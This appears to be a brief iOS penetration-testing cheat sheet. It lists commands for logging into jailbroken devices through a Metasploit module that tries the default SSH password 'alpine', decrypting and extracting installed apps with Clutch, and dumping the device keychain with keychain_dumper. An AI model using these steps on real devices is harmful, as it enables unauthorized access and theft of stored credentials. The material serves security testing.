Mobile Penetration Testing - iOS
Connect to iDevice using SSH or WinSCP
Default password is alpine |
Checking default password for OpenSSH
msfconsole
msf > use exploit/apple_ios/ssh/cydia_default_ssh
msf > show options
msf > set RHOST 10.9.8.84
msf > exploit
To obtain IPA file from installed Apps
./Clutch-2.0.4 -i
./Clutch-2.0.4 -d <id>
To check the location of Apps
ipainstaller -i <identifier>
otool -l -v <Application> | grep stack
Insecure Data Storage
Keychain Dumper
./keychain_dumper > output.txt